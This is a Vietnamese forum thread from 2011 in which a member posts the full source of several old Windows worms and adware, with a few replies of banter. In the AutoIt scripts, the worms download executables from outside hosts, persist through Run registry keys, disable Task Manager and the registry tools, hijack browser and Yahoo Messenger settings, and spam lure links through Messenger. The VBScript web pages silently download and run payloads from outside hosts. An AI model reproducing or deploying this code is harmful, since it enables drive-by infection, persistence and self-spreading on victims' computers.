Code-Virut

Tiêu đề: Code-Virut 23/8/2011, 11:56 am

Ranh~ roi tim dc 1 so code virut up len cho ku nam do~ bun`
Dung autoit de viet
Virut daokhuc.be
code:

; <AUT2EXE VERSION: 3.2.0.1>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: D:\AutoIT\Projects\Adware\DKC.au3>
; ----------------------------------------------------------------------------

;--------------------------------------------
; Tac Gia: Kevin Duong - KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
; Phat Hanh: 1-9-2006
;--------------------------------------------

; Thiet Lap
#NoTrayIcon
$website = "http://daokhuc.be"

; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf

; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community :: Chut gi de nho...")

; Danh Sach Tin Nhan Ngau Nhien
Dim $tin[10]
$tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... " & $website & " "
$tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... " & $website & " "
$tin[2] = "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... " & $website & " "
$tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... " & $website & " "
$tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & $website & " "
$tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $website & " "
$tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $website & " "
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $website & " "
$tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $website & " "
$tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $website & " "

; Ham Thay Doi Status & Gui Tin Nhan
While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Sleep(1800000)
WEnd

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: D:\AutoIT\Projects\Adware\DKC.au3>
; ----------------------------------------------------------------------------

Virut nhut.be
code:

<script language="VBScript">
on error resume next
dl = "http://nhut.be/dkc.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

Virut viet8x.evonet.ro
<html>
<head>
<title>
..:: Welcome ::..
</title>
<script language="VBScript">
on error resume next
dl = "http://viet8x.evonet.ro/task.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
</head>
<body bgcolor="lavender">
<br><br><br>
<center>
<h3>You're welcome</h3>
</center>
</body>
</html>

Virut vuichoi
code:

<script language="VBScript">
on error resume next
dl = "http://vuichoivn.com/guitangban.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svchost32.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

Virut vuivevn
code:

$website = "http://72.232.123.170/~love/"
$website2 = "Http://dasdasdasd"

If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/xlove.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(500)
EndIf
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "BkavFw", "REG_SZ","C:\WINDOWS\taskmng.exe")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ","C:\WINDOWS\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website2)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz", "content url", "REG_SZ", $website2)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast", "content url", "REG_SZ", $website2)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", "[You must be registered and logged in to see this link.]
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("http://adasd <=== See My Picture :X :X So Cute !!! (No Virus)")
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(600)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif

Virut gaixinh
code:

; <AUT2EXE VERSION: 3.1.1.112>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>
; ----------------------------------------------------------------------------

; ----------------------------------------------------------------------------
;
; AutoIt Version: 3.1.0
; Author: A.N.Other <myemail@nowhere.com>
;
; Script Function:
; Template AutoIt script.
;
; ----------------------------------------------------------------------------

; Script Start - Add your code below here

$version = "1.0"

AutoItSetOption ("TrayIconHide","1")
InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1)
sleep(3000)

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir & "\Messenger.exe")

InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1)
sleep(5000)
$checkfile = FileExists ( @WindowsDir & "\Version.txt" )
if $checkfile = 1 then
$file = FileOpen (@WindowsDir & "\Version.txt",0 )
$read = FileRead($file,3)
FileClose($file)
if $read <> $version then
InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1)
sleep (3000)
Run(@WindowsDir & "\Update.exe")
endif
endif

RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1")
AutoItSetOption ("WinTitleMatchMode", "2")
$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" )
if $check = 1 then
FileMove(@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" ,@WindowsDir &"\msconfig.exe" )
FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe")
endif

;; Đoạn này xóa đi để đoạn mã không bị lợi dụng
;; xLuke

if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or ($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("Gai xinh ne , gai xinh ne : <a href="http://xrobots.net/Gift/?file=Gaixinh.jpg" target="_blank" rel="nofollow" class="limitview">http://xrobots.net/Gift/?file=Gaixinh.jpg</a>")
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(400)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif
endif

Tiêu đề: Re: Code-Virut 25/8/2011, 1:25 pm

Cho một cái phần mềm mà tao chưa từng làm bao jo vs lại cái này đọc khó hĩu quá

Tiêu đề: Re: Code-Virut 25/8/2011, 8:28 pm

Trần Nam đã viết:: Cho một cái phần mềm mà tao chưa từng làm bao jo vs lại cái này đọc khó hĩu quá

đương nhiên.. hehehehee

Tiêu đề: Re: Code-Virut 26/8/2011, 1:13 pm

1 thằng webmaster như tao mà đọc con chưa hĩu nữa thì mày post lên cho ai đọc đc hay là spam vậy :d

Tiêu đề: Re: Code-Virut 26/8/2011, 9:57 pm

ôi zời ơi!!!!!!! đây chỉ là hàng mẫu năm 2005,6,7. 1 caon virut loại tầm tầm thui thì đâu có như vầy. chắc cũng cỡ gấp 10 lần con virut daokhuc.be đó chứ. vậy mà còn kiu là spam nữa.
không bik thì dựa cột mà nge. đừng có tía lia